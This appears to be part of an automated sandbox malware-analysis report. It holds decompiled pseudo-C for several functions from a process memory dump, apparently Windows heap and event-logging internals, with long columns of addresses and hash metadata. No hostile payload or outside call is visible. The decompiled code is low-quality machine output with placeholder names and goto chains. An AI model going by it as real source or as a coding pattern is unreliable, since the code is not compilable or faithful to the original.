				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				intOrPtr _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E03BF2280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0x3cc6110; // 0x44ec91fe
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0x3cc6110; // 0x44ec91fe
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = E03CA25DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												E03BEFFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0x3cc6110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
											if(( *(_t85 + 0x38) & 0x00000001) != 0) {
												_t118 = _t116 + 0x10;
												__eflags = _t118 & 0x00000fff;
												if((_t118 & 0x00000fff) == 0) {
													_t148 = _t118;
													_t140 = _t140 - 8;
													__eflags = _t140;
												}
											}
											_t117 = _v40;
											_t124 =  *_t145;
											__eflags = _t117 - _t140;
											if(_t117 >= _t140) {
												_t125 = _t124 & 0xfffffeff;
												__eflags = _t125;
												 *_t145 = _t125;
											} else {
												_t126 = _t124 | 0x00000100;
												_push(_t126);
												 *_t145 = _t126;
												E03CA2506(_t148, _t140, _t140 - _t117);
												_t85 = _v20;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												E03BEFFB0(_t117, _t145, _t85);
											}
											__eflags = _a8 & 0x00000002;
											if((_a8 & 0x00000002) != 0) {
												E03C1FA60(_t148, 0, _t117);
											}
											goto L42;
										}
										_push(_t122);
										_push(0);
										E03C9A80D( *((intOrPtr*)(_t147 + 0x20)), 0x12, _t139, _t116);
										goto L39;
									}
									_t137 = _t116 - (_t71 << 3);
									_t95 =  *_t137 ^ _t122 ^ _t137;
									__eflags = _t95;
									if(_t95 < 0) {
										L34:
										_t98 =  *(_t137 + 4) ^ _t122 ^ _t137;
										__eflags = _t98;
										L35:
										_t72 = _t98 & 0x000000ff;
										goto L37;
									}
									_t100 = _t95 >> 0x00000010 & 0x00007fff;
									__eflags = _t100;
									if(_t100 == 0) {
										goto L36;
									}
									_t137 = _t137 + _t100 * 0xfffffff8;
									__eflags = _t137;
									goto L34;
								}
								_t98 =  *_t145 ^ _t122 ^ _t116;
								goto L35;
							}
							if(_t136 == 0) {
								E03BEFFB0(_t115, _t145, _t147);
							}
							_t104 = E03CA3149(_t147, _t115, _a8);
							_t146 = _t104;
							if(_t104 == 0) {
								goto L41;
							} else {
								if(_v12 == 0) {
									E03BF2280(_t104, _t147);
								}
								_v5 = 0xff;
								E03CA2876(_t147, _t146);
								_t136 = _v12;
								goto L7;
							}
						}
						_t113 =  *(_t145 + 4);
						if(_v24 == 0 || _t113 == 0) {
							_t121 = _v16;
							goto L15;
						} else {
							_t121 = _v16;
							_t145 = _t145 ^ _t113;
						}
						L16:
					} while (_t145 != 0);
					L17:
					_t145 = _t121;
					goto L18;
				}
			}











































                                                                                                                                          0x03ca28f5
                                                                                                                                          0x03ca28fa
                                                                                                                                          0x03ca28fe
                                                                                                                                          0x03ca2900
                                                                                                                                          0x03ca2906
                                                                                                                                          0x03ca2908
                                                                                                                                          0x03ca2908
                                                                                                                                          0x03ca290e
                                                                                                                                          0x03ca2915
                                                                                                                                          0x03ca2918
                                                                                                                                          0x03ca291b
                                                                                                                                          0x03ca291d
                                                                                                                                          0x03ca2920
                                                                                                                                          0x03ca2920
                                                                                                                                          0x03ca2929
                                                                                                                                          0x03ca292c
                                                                                                                                          0x03ca292f
                                                                                                                                          0x03ca2932
                                                                                                                                          0x03ca2935
                                                                                                                                          0x03ca2938
                                                                                                                                          0x03ca293d
                                                                                                                                          0x03ca293d
                                                                                                                                          0x03ca2940
                                                                                                                                          0x03ca2944
                                                                                                                                          0x03ca2944
                                                                                                                                          0x03ca2948
                                                                                                                                          0x03ca294a
                                                                                                                                          0x03ca2950
                                                                                                                                          0x03ca2953
                                                                                                                                          0x03ca2958
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca295a
                                                                                                                                          0x03ca2962
                                                                                                                                          0x03ca2965
                                                                                                                                          0x03ca2976
                                                                                                                                          0x03ca2978
                                                                                                                                          0x03ca29e0
                                                                                                                                          0x03ca29e4
                                                                                                                                          0x03ca29e6
                                                                                                                                          0x03ca29e8
                                                                                                                                          0x03ca29eb
                                                                                                                                          0x03ca2993
                                                                                                                                          0x03ca2993
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2993
                                                                                                                                          0x03ca29ed
                                                                                                                                          0x03ca29ef
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca29f1
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca29f1
                                                                                                                                          0x03ca297a
                                                                                                                                          0x03ca299b
                                                                                                                                          0x03ca299d
                                                                                                                                          0x03ca29f5
                                                                                                                                          0x03ca29fb
                                                                                                                                          0x03ca29fb
                                                                                                                                          0x03ca2a00
                                                                                                                                          0x03ca2a04
                                                                                                                                          0x03ca2a04
                                                                                                                                          0x03ca2a06
                                                                                                                                          0x03ca2a13
                                                                                                                                          0x03ca2a13
                                                                                                                                          0x03ca2a18
                                                                                                                                          0x03ca2a44
                                                                                                                                          0x03ca2a44
                                                                                                                                          0x03ca2a44
                                                                                                                                          0x03ca2a46
                                                                                                                                          0x03ca2a50
                                                                                                                                          0x03ca2a5a
                                                                                                                                          0x03ca2a5e
                                                                                                                                          0x03ca2a99
                                                                                                                                          0x03ca2a9e
                                                                                                                                          0x03ca2aa0
                                                                                                                                          0x03ca2a70
                                                                                                                                          0x03ca2a70
                                                                                                                                          0x03ca2a72
                                                                                                                                          0x03ca2a75
                                                                                                                                          0x03ca2a82
                                                                                                                                          0x03ca2a89
                                                                                                                                          0x03ca2a89
                                                                                                                                          0x03ca2a7a
                                                                                                                                          0x03ca2a7f
                                                                                                                                          0x03ca2a7f
                                                                                                                                          0x03ca2a7f
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2a7f
                                                                                                                                          0x03ca2aa4
                                                                                                                                          0x03ca2aa4
                                                                                                                                          0x03ca2ab6
                                                                                                                                          0x03ca2abd
                                                                                                                                          0x03ca2ac0
                                                                                                                                          0x03ca2ac4
                                                                                                                                          0x03ca2ac6
                                                                                                                                          0x03ca2ac9
                                                                                                                                          0x03ca2acf
                                                                                                                                          0x03ca2ad1
                                                                                                                                          0x03ca2ad3
                                                                                                                                          0x03ca2ad3
                                                                                                                                          0x03ca2ad3
                                                                                                                                          0x03ca2acf
                                                                                                                                          0x03ca2ad6
                                                                                                                                          0x03ca2ad9
                                                                                                                                          0x03ca2adb
                                                                                                                                          0x03ca2add
                                                                                                                                          0x03ca2af9
                                                                                                                                          0x03ca2af9
                                                                                                                                          0x03ca2aff
                                                                                                                                          0x03ca2adf
                                                                                                                                          0x03ca2adf
                                                                                                                                          0x03ca2ae7
                                                                                                                                          0x03ca2aea
                                                                                                                                          0x03ca2aef
                                                                                                                                          0x03ca2af4
                                                                                                                                          0x03ca2af4
                                                                                                                                          0x03ca2b01
                                                                                                                                          0x03ca2b05
                                                                                                                                          0x03ca2b08
                                                                                                                                          0x03ca2b08
                                                                                                                                          0x03ca2b0d
                                                                                                                                          0x03ca2b11
                                                                                                                                          0x03ca2b1b
                                                                                                                                          0x03ca2b20
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2b11
                                                                                                                                          0x03ca2a60
                                                                                                                                          0x03ca2a61
                                                                                                                                          0x03ca2a6b
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2a6b
                                                                                                                                          0x03ca2a1f
                                                                                                                                          0x03ca2a25
                                                                                                                                          0x03ca2a25
                                                                                                                                          0x03ca2a27
                                                                                                                                          0x03ca2a38
                                                                                                                                          0x03ca2a3d
                                                                                                                                          0x03ca2a3d
                                                                                                                                          0x03ca2a3f
                                                                                                                                          0x03ca2a3f
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2a3f
                                                                                                                                          0x03ca2a2c
                                                                                                                                          0x03ca2a2c
                                                                                                                                          0x03ca2a31
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2a36
                                                                                                                                          0x03ca2a36
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2a36
                                                                                                                                          0x03ca2a0c
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2a0c
                                                                                                                                          0x03ca29a1
                                                                                                                                          0x03ca29a4
                                                                                                                                          0x03ca29a4
                                                                                                                                          0x03ca29b0
                                                                                                                                          0x03ca29b5
                                                                                                                                          0x03ca29b9
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca29bf
                                                                                                                                          0x03ca29c3
                                                                                                                                          0x03ca29c6
                                                                                                                                          0x03ca29c6
                                                                                                                                          0x03ca29cd
                                                                                                                                          0x03ca29d3
                                                                                                                                          0x03ca29d8
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca29d8
                                                                                                                                          0x03ca29b9
                                                                                                                                          0x03ca2980
                                                                                                                                          0x03ca2983
                                                                                                                                          0x03ca2990
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2989
                                                                                                                                          0x03ca2989
                                                                                                                                          0x03ca298c
                                                                                                                                          0x03ca298c
                                                                                                                                          0x03ca2995
                                                                                                                                          0x03ca2995
                                                                                                                                          0x03ca2999
                                                                                                                                          0x03ca2999
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2999

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e26f3547e17d4c3f14827127c959677d9643cd80cc1b1273d4bb5c008f5f27d6
                                                                                                                                          • Instruction ID: 161c3726e594c1a0a1aadea1022f164f1adc20b229b6edda82a46b22329fea6f
                                                                                                                                          • Opcode Fuzzy Hash: e26f3547e17d4c3f14827127c959677d9643cd80cc1b1273d4bb5c008f5f27d6
                                                                                                                                          • Instruction Fuzzy Hash: 4A71D435A04A2B9BCB24CF6DC88076EF7E6EF48318F198969D855DB290DB34DA41C790
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C6B8D0 Relevance: .2, Instructions: 199COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 39%
                                                                                                                                          			E03C6B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3cc7b9c; // 0x0
				_t124 = L03BF4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03C19800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E03C195B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E03C195D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L03BF77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03C19910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E03C195D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3cc7b9c; // 0x0
									_t92 = L03BF4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03C19910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E03BDA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E03C6E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E03C6E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E03C195B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                                                                          0x03c6b8d9
                                                                                                                                          0x03c6b8e4
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6b8e6
                                                                                                                                          0x03c6b8f3
                                                                                                                                          0x03c6b8f5
                                                                                                                                          0x03c6b8f5
                                                                                                                                          0x03c6b8f8
                                                                                                                                          0x03c6b920
                                                                                                                                          0x03c6b924
                                                                                                                                          0x03c6b936
                                                                                                                                          0x03c6b939
                                                                                                                                          0x03c6b93d
                                                                                                                                          0x03c6b948
                                                                                                                                          0x03c6b9a0
                                                                                                                                          0x03c6b9a0
                                                                                                                                          0x03c6b9a4
                                                                                                                                          0x03c6b9bf
                                                                                                                                          0x03c6b9c4
                                                                                                                                          0x03c6b9c6
                                                                                                                                          0x03c6b9cd
                                                                                                                                          0x03c6b9d1
                                                                                                                                          0x03c6bad4
                                                                                                                                          0x03c6bad8
                                                                                                                                          0x03c6bada
                                                                                                                                          0x03c6badc
                                                                                                                                          0x03c6badc
                                                                                                                                          0x03c6badf
                                                                                                                                          0x03c6bae0
                                                                                                                                          0x03c6bae2
                                                                                                                                          0x03c6bae4
                                                                                                                                          0x03c6baec
                                                                                                                                          0x03c6baee
                                                                                                                                          0x03c6baf0
                                                                                                                                          0x03c6baf0
                                                                                                                                          0x03c6baec
                                                                                                                                          0x03c6bafb
                                                                                                                                          0x03c6bafc
                                                                                                                                          0x03c6bafe
                                                                                                                                          0x03c6bb01
                                                                                                                                          0x03c6bb01
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6bb06
                                                                                                                                          0x03c6b9d7
                                                                                                                                          0x03c6b9db
                                                                                                                                          0x03c6b9db
                                                                                                                                          0x03c6b9de
                                                                                                                                          0x03c6b9de
                                                                                                                                          0x03c6b9e4
                                                                                                                                          0x03c6b9e7
                                                                                                                                          0x03c6b9ea
                                                                                                                                          0x03c6b9ec
                                                                                                                                          0x03c6b9ef
                                                                                                                                          0x03c6b9f3
                                                                                                                                          0x03c6ba1b
                                                                                                                                          0x03c6ba1b
                                                                                                                                          0x03c6ba23
                                                                                                                                          0x03c6ba24
                                                                                                                                          0x03c6ba27
                                                                                                                                          0x03c6ba2a
                                                                                                                                          0x03c6ba2b
                                                                                                                                          0x03c6ba2e
                                                                                                                                          0x03c6ba30
                                                                                                                                          0x03c6ba37
                                                                                                                                          0x03c6ba3f
                                                                                                                                          0x03c6ba9c
                                                                                                                                          0x03c6baa2
                                                                                                                                          0x03c6bb13
                                                                                                                                          0x03c6bb15
                                                                                                                                          0x03c6baae
                                                                                                                                          0x03c6baae
                                                                                                                                          0x03c6bab3
                                                                                                                                          0x03c6bab5
                                                                                                                                          0x03c6baba
                                                                                                                                          0x03c6bac8
                                                                                                                                          0x03c6bac8
                                                                                                                                          0x03c6baba
                                                                                                                                          0x03c6bacd
                                                                                                                                          0x03c6bacf
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6bacf
                                                                                                                                          0x03c6bb1a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6bb1c
                                                                                                                                          0x03c6baa7
                                                                                                                                          0x03c6bb11
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6bb11
                                                                                                                                          0x03c6baa9
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6ba41
                                                                                                                                          0x03c6ba41
                                                                                                                                          0x03c6ba41
                                                                                                                                          0x03c6ba58
                                                                                                                                          0x03c6ba5d
                                                                                                                                          0x03c6ba62
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6ba64
                                                                                                                                          0x03c6ba67
                                                                                                                                          0x03c6ba68
                                                                                                                                          0x03c6ba69
                                                                                                                                          0x03c6ba6c
                                                                                                                                          0x03c6ba6f
                                                                                                                                          0x03c6ba71
                                                                                                                                          0x03c6ba78
                                                                                                                                          0x03c6ba80
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6ba90
                                                                                                                                          0x03c6ba90
                                                                                                                                          0x03c6ba97
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6ba97
                                                                                                                                          0x03c6b9f5
                                                                                                                                          0x03c6b9f7
                                                                                                                                          0x03c6b9f7
                                                                                                                                          0x03c6b9fa
                                                                                                                                          0x03c6ba03
                                                                                                                                          0x03c6ba07
                                                                                                                                          0x03c6ba0c
                                                                                                                                          0x03c6ba10
                                                                                                                                          0x03c6ba17
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6b9f7
                                                                                                                                          0x03c6b9a6
                                                                                                                                          0x03c6b9a8
                                                                                                                                          0x03c6b9af
                                                                                                                                          0x03c6b9b3
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6b9b9
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6b9b9
                                                                                                                                          0x03c6b94d
                                                                                                                                          0x03c6b98f
                                                                                                                                          0x03c6b995
                                                                                                                                          0x03c6b999
                                                                                                                                          0x03c6b960
                                                                                                                                          0x03c6b967
                                                                                                                                          0x03c6b968
                                                                                                                                          0x03c6b96a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6b96a
                                                                                                                                          0x03c6b99b
                                                                                                                                          0x03c6b99e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6b99e
                                                                                                                                          0x03c6b951
                                                                                                                                          0x03c6b954
                                                                                                                                          0x03c6b95a
                                                                                                                                          0x03c6b95e
                                                                                                                                          0x03c6b972
                                                                                                                                          0x03c6b979
                                                                                                                                          0x03c6b97d
                                                                                                                                          0x03c6b97f
                                                                                                                                          0x03c6b980
                                                                                                                                          0x03c6b982
                                                                                                                                          0x03c6b984
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6b984
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6b926
                                                                                                                                          0x00000000
                                                                                                                                          0x03c6b926

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 66a56a465cb40fde88a13797ad502d861cd9407ef9935378bfe33fd20b2a780f
                                                                                                                                          • Instruction ID: 44f2902bebc063d6b8dc28627838bb8eccac49fde2da772d485d98e26f6acaa8
                                                                                                                                          • Opcode Fuzzy Hash: 66a56a465cb40fde88a13797ad502d861cd9407ef9935378bfe33fd20b2a780f
                                                                                                                                          • Instruction Fuzzy Hash: 69710D36200B01AFD721DF26CC85F66BBF9EB44720F194568E655CB6A0DB70EE44DB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C56DC9 Relevance: .2, Instructions: 199COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                          			E03C56DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03BF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03C56B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03BF7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03C19AE0();
					_t87 = L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E03C5795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E03C5795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E03C5795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E03C5795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03BF4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03C56B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03C56B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03C56B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03C56B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03BF7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03C19AE0();
								L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03BF2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03BF2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03BF2400( &_v52);
							}
							if(_v28 >= 0) {
								return L03BF2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                                                                          0x03c56dd4
                                                                                                                                          0x03c56dde
                                                                                                                                          0x03c56de1
                                                                                                                                          0x03c56de3
                                                                                                                                          0x03c56de6
                                                                                                                                          0x03c56de9
                                                                                                                                          0x03c56dec
                                                                                                                                          0x03c56def
                                                                                                                                          0x03c56df2
                                                                                                                                          0x03c56df5
                                                                                                                                          0x03c56dfe
                                                                                                                                          0x03c56e04
                                                                                                                                          0x03c56e09
                                                                                                                                          0x03c56e0d
                                                                                                                                          0x03c56e18
                                                                                                                                          0x03c56e1b
                                                                                                                                          0x03c56e22
                                                                                                                                          0x03c56e2d
                                                                                                                                          0x03c56e30
                                                                                                                                          0x03c56e36
                                                                                                                                          0x03c56e42
                                                                                                                                          0x03c56e4d
                                                                                                                                          0x03c56e50
                                                                                                                                          0x03c56e55
                                                                                                                                          0x03c56e5c
                                                                                                                                          0x03c56e6e
                                                                                                                                          0x03c56e5e
